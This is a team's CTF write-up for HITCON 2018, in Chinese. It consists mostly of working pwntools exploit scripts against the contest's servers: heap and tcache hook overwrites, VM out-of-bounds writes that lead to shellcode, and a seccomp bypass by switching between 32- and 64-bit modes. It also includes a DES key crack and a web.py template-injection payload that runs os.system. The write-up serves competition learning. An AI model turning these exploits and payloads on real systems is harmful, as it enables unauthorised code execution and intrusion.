EOP那个题是个twofish加密,google里搜table里的int能搜到
2018 hitcon CTF
By Nu1L
比赛网址:https://ctf2018.hitcon.org/
比赛时间:2018/10/20 02:00 UTC ~ 2018/10/22 02:00 UTC
PWN
children tcache
from pwn import *
#p=process('./child',env={'LD_PRELOAD':'./libc.so.6'})
p=remote('54.178.132.125', 8763)
libc = ELF('./libc.so.6')
def add(size,data):
p.recvuntil('choice')
p.sendline('1')
p.recvuntil('Size:')
p.sendline(str(size))
p.recvuntil('Data:')
p.send(data)
def dele(index):
p.recvuntil('choice')
p.sendline('3')
p.recvuntil('Index')
p.sendline(str(index))
for i in range(7):
add(0x80,'xxx\n')
for i in range(7):
dele(i)
for i in range(7):
add(0x110-8,'xxx\n')
add(0x110-8,'aaaa\n')#7
add(0x100,'bbbb\n')#8
add(0x100,'cccc\n')#9
for i in range(7):
dele(i)
dele(8)
dele(7)
#raw_input()
for i in range(7):
add(0x110-8,'aaaa\n') #0-6
add(0x110-8,'a'*(0x110-8))#7
for i in range(7):
dele(i)
#raw_input()
for i in range(7):
add(0x80,'1234567\n')#0-6
add(0x80,'xxxxxxxx\n')#8
for i in range(7):
dele(i)
add(0x60,'ABCD\n')#0
dele(8)
dele(9)
add(0x40,'a\n')#1
add(0x30,'b\n')#2
add(0x500,'aaaa\n')#3
add(0x120,'bbbb\n')#4
#0,3->same chunk
dele(3)
p.recvuntil('choice')
p.sendline('2')
p.recvuntil("Index:")
p.sendline('0')
addr = u64(p.recv(6).ljust(8,'\x00'))
libc_base = addr - (0x00007f2e9c12dca0-0x7f2e9bd42000)
info("libc:0x%x",libc_base)
malloc_hook = libc_base+libc.symbols['__malloc_hook']
info("malloc hook:0x%x",malloc_hook)
one = libc_base + 0x10a38c
add(0x500,'aaaaa\n')#3
dele(3)
add(0x120,'ABCDABCD\n')
dele(4)
dele(3)
dele(0)
add(0x120,p64(malloc_hook)+'\n')
add(0x120,p64(one)+'\n')
add(0x120,p64(one)+'\n')
p.sendline('1')
p.sendline('304')
p.interactive()
Groot
指针未初始化
#!/usr/bin/env python2
# coding:utf-8
from pwn import *
import os
VERBOSE = 1
DEBUG = 1
LOCAL = 0
target = 'groot'
libc = [] # 加载指定libc
break_points = []
remote_addr = '54.238.202.201'
remote_port = 31733
def hint(break_points=[]):
if LOCAL:
out = 'gdb attach ' + str(pwnlib.util.proc.pidof(target)[0])
for bp in break_points:
out += " -ex 'b *{}'".format(hex(bp))
raw_input(out+" -ex 'c'\n" if break_points else out+"\n")
# if libc:
# elf = ELF(libc[0])
# gadget = lambda x: next(elf.search(asm(x, os='linux', arch='amd64')))
if LOCAL:
if libc:
for libc_ in libc:
os.environ['LD_PRELOAD'] = os.environ['PWD'] + '/' + libc_ + ':'
p = process('./'+target)
if DEBUG:
out = 'gdb attach ' + str(pwnlib.util.proc.pidof(target)[0])
for bp in break_points:
out += " -ex 'b *{}'".format(hex(bp))
raw_input(out+" -ex 'c'\n" if break_points else out+"\n")
else:
p = remote(remote_addr,remote_port)
if VERBOSE: context.log_level = 'DEBUG'
def mkdir(dir):
p.sendlineafter('$ ','mkdir '+dir)
def touch(name):
p.sendlineafter('$ ','touch '+name)
def rm(name):
p.sendlineafter('$ ','rm '+name)
def mkfile(name, content):
p.sendlineafter('$ ','mkfile '+name)
p.sendlineafter('Content?', content)
def cd(dir):
p.sendlineafter('$ ','cd '+dir)
def ls(dir):
if dir:
p.sendlineafter('$ ','ls '+dir)
else:
p.sendlineafter('$ ','ls')
def mv(src, dst):
p.sendlineafter('$ ','mv %s %s' %(src,dst))
def exp(cmd=None):
mkdir('A'*0x30)
cd('A'*0x30)
touch('B'*0x30)
cd('..')
rm('A'*0x30)
touch('X')
touch('C'*0x30)
rm('X')
ls('')
p.recv(0x14)
heap = u64(p.recv(6).ljust(8,'\x00'))
print hex(heap)
heap_base = heap - 76864
print hex(heap_base)
rm(p64(heap))
# raw_input()
ls(p64(heap_base+0x11fd0)[:-2])
# raw_input()
for i in range(4):
ls('HEHE')
# raw_input()
ls('A'*8+p16(0x561))
rm('/etc/passwd')
ls('/')
ls('/')
ls('/')
p.recvuntil('dev')
p.recv(0x10)
libc = u64(p.recv(6).ljust(8,'\x00'))
print hex(libc)
libc_base = libc - 0x789ca0
print hex(libc_base)
# raw_input()
for i in range(2):
ls('D'*0x30)
# raw_input()
rm('/dev')
# add bin sh
# ls('')
mv('HEHE','sh')
# mv('/bin/id','/bin/sh')
# cd('../../../../../../../../../../../bin')
for i in range(9):
ls('D'*0x60)
# ls('E'*0x40)
# ls('E'*0x40)
rm('/boot')
ls('E'*0x40)
# raw_input('hehehe')
free_hook = 7911656 + libc_base
malloc_hook = 0x789c30 + libc_base
magic = 0x4f440 + libc_base + 3792896
ls('X'*0x40+p64(heap_base+0x50-0x28))
ls('D'*0x30)
# raw_input('sending free hook')
# ls(p64(free_hook-0x28)[:-2])
# raw_input()
print hex(magic)
print hex(free_hook)
rm('A'*0x28+p64(free_hook))
# mkdir('../../../../../../../../../../../../../../bin/sh')
# mv('/bin/id',p64(magic))
ls(p64(magic))
p.recvrepeat(1)
# raw_input()
p.sendline('rm ' + '../'*8+'home/groot/sh')
# raw_input()
# ls('123')
# mkdir('ttt')
# cd('ttt')
# for i in range(10):
# mkdir(str(i)*0x30)
# mkdir('C'*0x30)
# cd('C'*0x30)
# touch('A'*0x30)
# cd('..')
# rm('C'*0x30)
# touch()
p.interactive()
if __name__ == '__main__':
exp("id")
Abyss I
是个堆栈机VM
swap 没有边界检查,可以越界到machine
把machine盖成负数,可以向上写got表
输入中放入shellcode,改shellcode跳过去即可
from pwn import *
p = remote('35.200.23.198', 31733)
context(arch = 'amd64', os = 'linux')
context.aslr = False
#p = process('./user.elf')
#gdb.attach(p)
#p = process('./hypervisor.elf kernel.bin ld.so.2 ./user.elf'.split(' '))
payload = '4294967295\\'
payload += '%' * ((0x2020a0 - 0x202030) / 4 - 2)
payload += '0:'
payload += '1:'
payload += '%%%%1;'
payload += str(0x2030A4 + 0x100 - 0x7b6) + '+'
# payload += str(0x7BEC0 - 0x4f322) + '\x011'
# payload += ';-'
# payload += '0;'
# payload += '.'
payload += '0;'
payload += ','
payload = payload.ljust(0x100, '\x01')
payload += asm(shellcraft.amd64.linux.open('flag', 0, 0))
payload += asm(shellcraft.amd64.linux.read(3, 'rsp', 0x100))
payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 0x100))
p.sendline(payload)
p.interactive()
Abyss II
系统调用号对应的处理函数(大概)
(0, '0x239L') read
(1, '0xa9aL') write
(2, '0x972L') open
(3, '0xf4bL')
(5, '0x1caL')
(9, '0xc47L')
(10, '0x17b2L')
(11, '0xd54L')
(12, '0xbc6L')
(20, '0xb0dL')
(21, '0xa4cL')
(60, '0x966L')
(158, '0xb87L')
(221, '0x195L')
(231, '0x966L')
(257, '0xa39L')
write_sys 应该可以溢出。。。。试一试
让buf的地址加上size溢出到一个很小的数应该就可以过那个检查
kmalloc很大的数的时候会返回0,看了一下hypervisor似乎image base也是0,大概可以覆盖代码
hypervisor还有个蜜汁验证
已经能成功执行shellcode了,还需要逆一下串口的交互,手写一下open,read和write
from pwn import *
import time
context(arch = 'amd64', os = 'linux')
context.aslr = False
def runshellcode(p, s):
payload = '4294967295\\'
payload += '%' * ((0x2020a0 - 0x202030) / 4 - 2)
payload += '0:'
payload += '1:'
payload += '%%%%1;'
payload += str(0x2030A4 + 0x100 - 0x7b6) + '+'
payload += '0;'
payload += ','
payload = payload.ljust(0x100, '\x01')
payload += asm('push 0x61616161')
payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 0x4))
payload += asm(shellcraft.amd64.linux.read(0, 'rsp', 0x1000))
payload += asm('jmp rsp')
p.sendline(payload)
p.recvuntil('aaaa')
p.send(s)
context.log_level = 'debug'
def main():
p = remote('35.200.23.198', 31733)
#p = process('./user.elf')
#p = process('./hypervisor.elf kernel.bin ld.so.2 ./user.elf'.split(' '))
payload = ''
mmap_addr = 0x500000
payload += asm(shellcraft.amd64.linux.mmap(mmap_addr, 0x10000, 7, 16, -1, 0))
payload += asm('push rax')
payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 8))
payload += asm(shellcraft.amd64.linux.read(0, mmap_addr, 0x10000))
payload += asm(shellcraft.amd64.linux.write(1, mmap_addr, 0x10000000000000000 - mmap_addr + 0x300000))
payload += asm('push rax')
payload += asm(shellcraft.amd64.linux.write(1, 'rsp', 8))
runshellcode(p, payload)
time.sleep(10)
payload = 'flag2'.ljust(8, '\x00')
payload += p64(3) + p64(0x100) + p64(0x100)
payload += p64(1) + p64(0x100) + p64(0x100)
payload = payload.ljust(0xa5d, '\x90') + '\x90'*36
payload += asm('''
mov dx, 0x8000
mov eax, 0x0
''')
payload += '\xef\xed'
payload += asm('''
mov dx, 0x8001
mov eax, 0x8
''')
payload += '\xef\xed'
payload += asm('''
mov dx, 0x8002
mov eax, 0x20
''')
payload += '\xef\xed'
payload += '\xeb\xfe'
payload = payload.ljust(0xadb, '\x90')
payload += '\xeb\x80'
p.send(payload)
p.interactive()
if __name__ == '__main__':
main()
Super Hexagon | solved 1, stuck 2 | pzhxbz
第一层
scanf里面似乎有一个溢出,可以覆盖函数指针
Reverse
EOP
感觉是用c++的异常处理机制实现的一个像控制流平坦化的东西。。。。
使用gdb script进行跟踪
b *(0x8000000+0x5620)
python f = open('log','w')
run < test_input
set $ipx=1
while ($ipx)
python a = hex(gdb.parse_and_eval("$rax"))
python f.write(a+'\n')
continue
end
可以拿到程序的调用函数顺序,大致分析之后发现程序大概为3个循环对用户输入进行加密
大致分析后可以发现中间很多代码都是一样的,猜测是一个循环被拆分出来的结果。
于是半猜半蒙的一步一步还原算法 orz
还原之后的算法如下:
from pwn import *
index_table1 = [1448535819,1128528919,3149608817L,134807173,3570665939L,3806473211L,2728570142L,1936927410,3014904308L,757936956,2358043856L,3082270210L,2374833497L,101119117,2324303965L,3166450293L,3334870987L,3486456007L,2593817918L,2863289243L,1296954911,3941258622L,1212708960,3772817536L,774785486,1061104932,3284375988L,336915093,4227576212L,1970658879,4210704413L,3907542533L,3469666638L,791656519,555856463,1600120839,1953771446,3318050105L,3739122733L,1246425883,3924406156L,3048553849L,2004309316,2981184143L,117900548,2913818271L,1347425158,1162152090,4075994776L,3452801980L,1802191188,3368558019L,2526413901L,1717973422,3099086211L,320073617,3267520573L,2459073467L,690572490,2947538404L,3200170254L,960092585,993743570,623234489,4042274275L,1330609508,707409464,4261233945L,2644344890L,3520169900L,3553823959L,2341200340L,3065399179L,33721211,1145370899,2678000449L,3789639945L,1094809452,1819034704,825304876,505323371,454758676,2560101957L,1549570805,589510964,3991785594L,370565614,4244419728L,2240146396L,3974898163L,2391699371L,724289457,1313770733,185304183,2543318468L,1482222851,842161630,1195869153,16904585,2930650221L,3840204662L,2122209864,2442199369L,4160172263L,2021174981,2577006540L,1835906521,2779097114L,2223250005L,3604382376L,4143366510L,1633760426,202146163,2071712823,875866451,1532729329,1280051094,3722249951L,0,421108335,2088554803,2475919922L,2896996118L,252705665,4126522268L,2139073473,1027450463,404253670,606354480,3132802808L,1229556201,2509602495L,1650609752,572704957,976921435,3031747824L,3537042782L,4025441025L,2408554018L,3755969956L,2745392279L,2273796263L,488498585,2610656439L,2307484335L,1515873912,3654908201L,2711738348L,286352618,522153698,4294954594L,2661219016L,1077970661,3705468758L,640071499,1431674361,1397975412,353704732,2812748641L,1566401404,3250655951L,2425417920L,3385453642L,1381144829,2694850149L,3435946549L,741130933,2172752938L,4278075371L,673758531,943204384,387420263,1499012234,67403766,3351766594L,3873854477L,269522275,3823360626L,1987486925,1010587606,3115957258L,1886408768,3671720923L,2155898275L,168457726,1044307117,2627498419L,3958056183L,3638069408L,909517352,84250239,1785376989,1179021928,808507045,1263207058,1667481553,3688624722L,2256965934L,859024471,437969053,3233866566L,1903272393,1414818928,1852755755,4177054566L,656885442,2290653990L,2189618904L,2492763958L,1616954659,3587569754L,3503322661L,1465325186,538985414,3890718084L,2964370182L,1111625118,2037997388,2105352378,2829637856L,3301219504L,2762234259L,1734852647,235801096,2880152082L,1920129851,3183330300L,3402274488L,218984698,4193860335L,1364320783,4059153514L,1768540719,4109650453L,892688602,471602192,4008618632L,926405537,2054825406,50559730,3621221153L,1701137244,151588620,3857002239L,3419105073L,1751661478,1684323029,2998024317L,4092808977L,3216984199L,2206408529L,303177240,2795950824L,1583225230,2846435689L,1869561506]
index_table2 = [67438343,1346661484,3474112961L,1136470056,1858205430,1427801220,1604730173,4240686525L,3371867806L,1618495560,1593692882,628543696,132669279,2381579782L,895667404,561240023,3190127226L,4173773498L,2808121223L,3460902446L,3932426513L,1548445029,714375553,4106859443L,247054014,2317113689L,1819754817,943073834,3236991120L,4213957346L,3865778200L,2472125604L,1764338089,2648709658L,847942547,269753372,1413573483,1937837068,2714974007L,3985395278L,2005142283,2140013829,2180714255L,2086886749,3607942099L,3730649650L,1292146326,357233908,1805590046,2673257901L,3273509064L,2629563893L,2269691839L,1537423930,1158584472,1009986861,2202908856L,1030275778,2539430819L,2788911208L,3407333062L,2292903662L,3906119334L,156361185,3772295336L,2693322968L,2894582225L,4135519236L,4281263589L,1791291889,1966259388,424017405,3259377447L,3596041276L,2249412688L,3571551115L,1281325433,2494692347L,3450107510L,1337073953,3663213877L,1872369945,2100867762,606945087,2581929245L,3439303065L,2651669058L,134876686,2182502231L,2448364307L,2427780348L,1685933903,3973554593L,180140473,0,828885963,3518980963L,471536917,335103044,3096890058L,3316545656L,2722000751L,1926947811,1886147668,580816783,1091280799,3528604475L,536235341,1470903091,3674462938L,1403597876,2336732854L,1657733119,112439472,468929098,2517060684L,4201647373L,447260069,1629726631,1831644846,1203253039,3145437842L,2989126515L,2963064004L,1048943258,1361019779,3850780736L,4039947444L,2515145748L,3719326314L,1994384612,2942994825L,2922473062L,4269083146L,1189331136,3504639116L,1481532002,600137824,915379348,1724643576,673330742,1004237426,3918088521L,1494584717,3249241983L,2034087349,1737496343,2827146966L,981507485,4254618194L,4120009820L,3304429463L,2876214926L,2060512749,3382800753L,2449623883L,2605951658L,2360338921L,2127948522,199710294,2849585465L,3741769181L,1670713360,3029976003L,1071543669,4013619705L,1561365130,647727240,3878746103L,2855559521L,735014510,1146451831,1270294054,2072707586,45529015,1213890174,809247780,336665371,2760761311L,2741338240L,3839733679L,514695842,781289094,402408259,1224839569,3163803085L,1899477947,1752319558,2982619947L,2158026976L,202311945,380087468,2314273025L,1697030304,3706422661L,2916892222L,65886296,3117229349L,2562650866L,2403512753L,312650667,1391647707,3077872539L,876159779,4053228379L,3049401388L,1323945678,1526257109,539506744,801794409,2782277680L,1122420679,740766001,666920807,22802415,90106088,869366908,3326287904L,3393988905L,1079013488,290452467,3946839806L,4187837781L,2225465319L,3999340054L,1459084508,3783477063L,3212744085L,2248017928L,3340292047L,4068082435L,3585762404L,3811963120L,763158238,404623890,1953059667,1257032137,3639509634L,2384027230L,3122691453L,695851481,2584233285L,963495365,3652545901L,490797818,3056563316L,936672123,2019973722,3798867743L,4079086828L,4146392043L,3184009762L,3010567324L,3540636884L,266490193,223667942]
index_table3 = [3188637369L,582820552,701114700,4220844977L,1243302643,2083749073,4237360308L,274927765,1468159766,1029651878,1293897206,3161832498L,1722705457,1730635712,1125598204,1117667853,3815957466L,1443583719,2167046548L,3554136844L,354161947,1167738120,92210574,1059340077,2663948026L,4009881435L,446503648,2026207406,1941074730,3213344584L,3251618066L,1097613687,1586388505,607134780,3104487868L,3832997087L,83231871,2953228467L,1872916286,1612931269,1331974013,3884246949L,2345962465L,2469565322L,675489981,3492139126L,3095640141L,1442403741,3062609479L,3368273949L,3570652169L,733031367,192351108,1568431459,3377121772L,1542544279,510336671,2284226715L,3892701278L,3426077794L,1883271248,3517763975L,2554697742L,3136862918L,2546243573L,1649959502,1909027233,66192250,1674666943,4246338885L,2109373728,2309982570L,4159174448L,3044652349L,2275903328L,2671877899L,1003633490,1088766086,933312467,3918326191L,3308897645L,384702049,3601389186L,2716639703L,750070978,4120704443L,1792895664,1800694593,2195227374L,3070408630L,2719916717L,3461271273L,234491248,3775521105L,2926423596L,3696680183L,3984256464L,1240025481,1181238898,2833295576L,2691014694L,1205946243,142936318,642459319,1594318824,785264201,3579500024L,151783695,3934186197L,117704453,260116475,496573925,941635624,3858752814L,1051541212,1817209924,2994582072L,2393607791L,109905652,3859670612L,2118680154,2887167143L,1638555956,3643398521L,1916498651,2428539120L,3451702675L,3019158473L,1848340175,1416647788,2143387563,2587794053L,3679640562L,2978984258L,4001951402L,1400132457,558834098,3409038183L,2612501364L,667035462,853422685,2067233748,2629016689L,2761139289L,3529429757L,4284678094L,632890829,1842965941,4095079498L,816132310,3722435846L,1700554059,1214269560,2000975701,824979751,1359958498,3808158251L,2158198885L,2769986984L,1267878658,454302481,3299919004L,1958114351,4070109886L,328274927,4193253690L,967391705,1020673111,345314538,3958893348L,2870127522L,235408906,2035054943,2580322815L,2437517569L,3225862371L,2059303461,3283403673L,184420981,1324174988,1517836902,3727548028L,3187457475L,2203157279L,1392333464,758918451,41616011,908604962,25756145,4167497931L,0,3144792887L,2461766267L,1967093214,1755736123,2637864320L,3035673804L,4078039887L,3258827368L,470817812,208866433,793194424,2808194851L,3401108118L,2251196049L,4276878911L,2486604943L,534912878,1559583890,1502239004,426711450,1476614381,4196268608L,1284918279,3634419848L,3485978392L,3752124301L,2842274089L,3671841283L,708323894,1142113529,3335243287L,1993176740,903492952,4050317764L,2321386000L,2521667076L,1350979603,1764714954,877868201,2220196890L,303567390,2371456277L,2245821931L,392632208,3975408673L,2362477796L,2744623964L,979057315,4041470005L,3343042534L,4134467265L,417732715,300552548,590619449,3766542496L,2512360830L,2401406878L,1691706554,2862328403L,2800264914L,2912922966L,2951000029L,861352876,3609319283L,549855299]
index_table4 = [3254152897L,164942601,2959793584L,416270104,3784037601L,3834433764L,1757560168,4258422525L,2986054833L,2131031679,4036018416L,3644434905L,1563614813,736295723,398904087,1403689811,528699679,0,3384014025L,2215344004L,759112749,1277807180,3357720008L,1943478643,2539385239L,2491493012L,3634946264L,1303937869,3153435835L,425627161,4132249590L,545110560,2202526083L,1090133312,4120364277L,3072740279L,1657550178,2380244109L,3514577873L,1542390107,2278665351L,2295898248L,1871620975,598171939,2927150510L,3534153938L,475630108,3311412165L,504502302,1917216882,749628716,286987281,3695095260L,4174732024L,1963654773,1373702481,3543638483L,1787408234,1118932802,76958980,2353982860L,3284008131L,3672339162L,989458234,935031095,2324902538L,4261971454L,3257710018L,361584917,821552944,3422054091L,1956362100,2660180638L,1717205094,958608441,454368283,3972614892L,698968361,4074459890L,573974562,828812849,4094070260L,2241478277L,1203145543,2123743102,1341329743,3981968365L,3843922405L,1174214981,2455565714L,3871818470L,878815796,337383444,904979253,2951318703L,138779144,657533991,84345861,786825006,4011037167L,2000776311,2829392552L,3564845012L,222469645,2889045932L,3681696731L,3173532605L,2157787776L,1702929253,244860174,2165076865L,3090106296L,2094935420,3719292125L,2044275065,4232255484L,2252400006L,1678895716,2332195723L,2408855183L,3796963298L,1796793963,712225322,314691346,2699067552L,3756291807L,1601784927,2579739801L,2783413413L,1227804233,4181988345L,3617713367L,3881176039L,2759249316L,1667071075,628801061,4081720307L,1741369703,4001552622L,2789040038L,3341529543L,3227985856L,122459655,1847583342,2867759274L,3441801677L,1628892769,215209740,3043875253L,1424362836,499696413,2479733907L,1126221379,3472843470L,1906094961,1463604823,1264933963,3065447094L,2500879253L,1619502944,1479924312,2195105922L,3927217642L,444880154,4212097531L,1454219094,3759840736L,1047503422,115203846,2303322505L,619444004,2047079034,1097552961,3821029091L,2441490065L,674766888,2639657373L,3588914901L,1177010758,1817473132,569176865,1349533776,1518225498,3732226014L,648045862,1220511560,2988527538L,3505224400L,908736566,2877276587L,3210990015L,2838778793L,1592264030,851211570,26298625,1073670975,1433879637,951221560,3334142150L,4288269567L,2913083053L,1554224988,38507010,1993352566,2729120418L,3898542056L,996714043,3036450996L,4043409905L,168691722,3480103887L,1879964272,3593512406L,2102355069,194986251,1503957849,3951418603L,64674563,1035303229,1147949124,1257510218,4158412535L,1841641837,2073213819,1379652178,2669570975L,2382725006L,2555575704L,1767076969,3166243516L,858602547,3127170490L,2018009208,3116240569L,2738510755L,1009004604,252251151,2529867926L,2708588961L,3203569854L,3395891146L,796177967,2417452944L,3304155844L,3434410188L,4204710138L,277503248,2630135964L,3922611945L,2609391259L,2585358234L,324044307,1315067982,2813073063L,374833686,3014657715L]
xor_table = [40806489, 4046542995L, 2337878950L, 3878399079L, 449612036, 776524271, 1059181995, 1764973087, 3196283120L, 4059530435L, 404769168, 416194920, 865505623, 569110855, 4202362994L, 2884025964L, 1364091262, 3967238082L, 3323511658L, 4191090596L, 1977398017, 2934017146L, 619849321, 2598057311L, 2001658147, 3371447456L, 4101937135L, 1132035575, 4142164549L, 95912149, 3823222592L, 1423799602]
flag = raw_input()
def to_bytes(d):
res = []
tmp = hex(d).replace('0x','').rjust(8,'0')
for i in xrange(0,8,2):
res.append(int(tmp[i:i+2],16))
return res[::-1]
def ROR(d,n):
return ( (d >> n) | (d << (32-n)) ) % 0x100000000
def ROL(d,n):
return ( (d << n) | (d >> (32-n)) ) % 0x100000000
def en(data):
t1 = u32(data[0:4])
t2 = u32(data[4:8])
t3 = u32(data[8:12])
t4 = u32(data[12:16])
t1 ^= 0x0C01A4D6E
t2 ^= 0x0A4CB6636
t3 ^= 0x5B0F5BA1
t4 ^= 0x2B266926
#print(hex(t1),hex(t2),hex(t3),hex(t4))
for i in xrange(0,32,4):
tt5 = to_bytes(t1)
t5 = index_table1[tt5[0]] ^ index_table2[tt5[1]] ^ index_table3[tt5[2]] ^ index_table4[tt5[3]]
tt6 = to_bytes(t2)
t6 = index_table2[tt6[0]] ^ index_table3[tt6[1]] ^ index_table4[tt6[2]] ^ index_table1[tt6[3]]
t3 ^=(xor_table[i] + t5 + t6)%0x100000000
#print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))
t3 = ROR(t3,1)
t4 = ROL(t4,1)
#print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))
t4 ^= (xor_table[i+1] + t5 + t6 * 2)%0x100000000
tt5 = to_bytes(t3)
t5 = index_table1[tt5[0]] ^ index_table2[tt5[1]] ^ index_table3[tt5[2]] ^ index_table4[tt5[3]]
tt6 = to_bytes(t4)
t6 = index_table2[tt6[0]] ^ index_table3[tt6[1]] ^ index_table4[tt6[2]] ^ index_table1[tt6[3]]
t1 ^= (xor_table[i+2] + t5 + t6)%0x100000000
t1 = ROR(t1,1)
t2 = ROL(t2,1)
t2 ^= (xor_table[i+3] + t5 + t6 * 2)%0x100000000
print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))
t3 ^= 0x0EF75CB8F
t4 ^= 0x0A037222A
t1 ^= 0x0BA69619A
t2 ^= 0x60798932
return p32(t3) + p32(t4) + p32(t1) + p32(t2)
解密算法如下:
def de(data):
t3 = u32(data[0:4])
t4 = u32(data[4:8])
t1 = u32(data[8:12])
t2 = u32(data[12:16])
t3 ^= 0x0EF75CB8F
t4 ^= 0x0A037222A
t1 ^= 0x0BA69619A
t2 ^= 0x60798932
for i in range(0,32,4)[::-1]:
tt5 = to_bytes(t3)
t5 = index_table1[tt5[0]] ^ index_table2[tt5[1]] ^ index_table3[tt5[2]] ^ index_table4[tt5[3]]
tt6 = to_bytes(t4)
t6 = index_table2[tt6[0]] ^ index_table3[tt6[1]] ^ index_table4[tt6[2]] ^ index_table1[tt6[3]]
print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))
t2 ^= (xor_table[i+3] + t5 + t6 * 2)%0x100000000
t2 = ROR(t2,1)
t1 = ROL(t1,1)
t1 ^= (xor_table[i+2] + t5 + t6)%0x100000000
tt5 = to_bytes(t1)
t5 = index_table1[tt5[0]] ^ index_table2[tt5[1]] ^ index_table3[tt5[2]] ^ index_table4[tt5[3]]
tt6 = to_bytes(t2)
t6 = index_table2[tt6[0]] ^ index_table3[tt6[1]] ^ index_table4[tt6[2]] ^ index_table1[tt6[3]]
t4 ^= (xor_table[i+1] + t5 + t6 * 2)%0x100000000
t3 = ROL(t3,1)
t4 = ROR(t4,1)
t3 ^=(xor_table[i] + t5 + t6)%0x100000000
#print(hex(t1),hex(t2),hex(t3),hex(t4),hex(t5),hex(t6))
t1 ^= 0x0C01A4D6E
t2 ^= 0x0A4CB6636
t3 ^= 0x5B0F5BA1
t4 ^= 0x2B266926
return p32(t1) + p32(t2) + p32(t3) + p32(t4)
def xor_str(a,b):
res = ''
for i in xrange(16):
res += chr(ord(a[i]) ^ ord(b[i]))
return res
de_flag = [0x4F, 0x6F, 0xA7, 0x87, 0xE9, 0x51, 0x87, 0x64, 0x38, 0x2A, 0x46, 0xE5, 0x4F, 0x21, 0x9E, 0x1C, 0xCD, 0x65, 0xE1, 0x9A, 0x4F, 0xCF, 0xDE, 0x52, 0x09, 0xBF, 0x53, 0xC4, 0xB0, 0x95, 0x75, 0x31, 0xAC, 0x2F, 0xF4, 0x97, 0x1D, 0xA5, 0x9A, 0x02, 0xA8, 0xFF, 0xAE, 0x2E, 0xB9, 0x70, 0xCC, 0x02]
de_c = ''
for i in de_flag:
de_c += chr(i)
# a = en('a'*16)
# print('---')
# print(de(a))
print((xor_str(de_c[16:32],de(de_c[32:48]))))
# ~Exc3p7i0n-Ori3n7ed-Pr0grammin9~RoO0cks!!\o^_^o/
Web
On my raddit
8个字节分组加密,动一动LSB仍然可以解密,DES?
2e7e305f2da018a2cf8208fa1fefc238 + 加密的文件名 + 3ca92540eb2d0a42 下载文件
3ca92540eb2d0a42应该是padding,8个字节拿hashcat爆破了下
3ca92540eb2d0a42:0808080808080808:ldgonaro
Session..........: hashcat
Status...........: Cracked
Hash.Type........: DES (PT = $salt, key = $pass)
Hash.Target......: 3ca92540eb2d0a42:0808080808080808
爆破出来一个ldgonaro,FLAG但是不对,应该是个等效密钥。
首页有下载链接,发现能下载文件,于是解密:
from Crypto.Cipher import DES
key = 'ldgonaro'
def decrypt(decryptText):
try:
cipherX = DES.new(key, DES.MODE_ECB)
str = decryptText.decode('hex')
y = cipherX.decrypt(str)
return y[0:ord(y[len(y)-1])*-1]
except:
return ""
print decrypt('2e7e305f2da018a2cf8208fa1fefc238522c932a276554e5f8085ba33f9600b301c3c95652a912b0342653ddcdc4703e5975bd2ff6cc8a133ca92540eb2d0a42')
=>m=d&f=uploads%2F70c97cc1-079f-4d01-8798-f36925ec1fd7.pdf
将f参数换成app.py
加密得到E2272B36277C708BC21066647BC214B8,然后得到密钥megnnaro
On my raddit2
https://securityetalii.es/2014/11/08/remote-code-execution-in-web-py-framework/
web.py的db写的有问题:
# coding: UTF-8
import os
import urllib
import urlparse
from Crypto.Cipher import DES
ENCRPYTION_KEY = 'megnnaro'
def encrypt(s):
length = DES.block_size - (len(s) % DES.block_size)
s = s + chr(length)*length
cipher = DES.new(ENCRPYTION_KEY, DES.MODE_ECB)
return cipher.encrypt(s).encode('hex')
def decrypt(s):
try:
data = s.decode('hex')
cipher = DES.new(ENCRPYTION_KEY, DES.MODE_ECB)
data = cipher.decrypt(data)
data = data[:-ord(data[-1])]
return dict(urlparse.parse_qsl(data))
except Exception as e:
print e.message
return {}
print encrypt(urllib.urlencode({'m':'p','l':"${[].__class__.__base__.__subclasses__()[59]()._module.linecache.os.system('/read_flag > /tmp/fffza')}"}))
print encrypt(urllib.urlencode({'m':'d','f':'/tmp/fffza'}))
然后依次访问即可。
MISC
Lumosity
签到题
EV3 Basic
LEGO EV3机器人的数据包
81 xx 81 xx 84 xx 应该表示列,行,字符
0a 14 1e 28 32 3c 46 50 5a 64 6e 78 82 8c 96 a0
28 h i t c o n { m 1 n d 5 t 0 r m
36 _ c o m m u n i c a t i o n _ a
44 n d _ f i r m w a r e _ d e v e
52 l o p e r _ k i t }
32world
64bit ELF,retf切到32位代码,执行shellcode,24字节,syscall的时候IP需要大于FFFFFFFF
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x0000000c A = instruction_pointer >> 32
0001: 0x15 0x00 0x01 0x00000000 if (A != 0x0) goto 0003
0002: 0x06 0x00 0x00 0x00000000 return KILL
0003: 0x06 0x00 0x00 0x7fff0000 return ALLOW
切回64bit,跳一个one gadget,读一下fs拿地址
from pwn import *
#p = process('./32world')
p = remote('54.65.133.244', 8361)
context(bits = 32, arch = 'i386')
sc1 = '''
retf
'''
sc11 = asm('push 0x33')
sc1 = asm(sc1)
print sc1, len(sc1)
context(bits = 64, arch = 'amd64')
sc2 = asm('mov rax, fs:[rdx+0x900]; add rax, 0xf1147; call rax')
sc1 = sc11 + '\xe8\x10\x00\x00\x00' + sc2 + sc1
print sc1, len(sc1)
p.sendline(sc1)
p.interactive()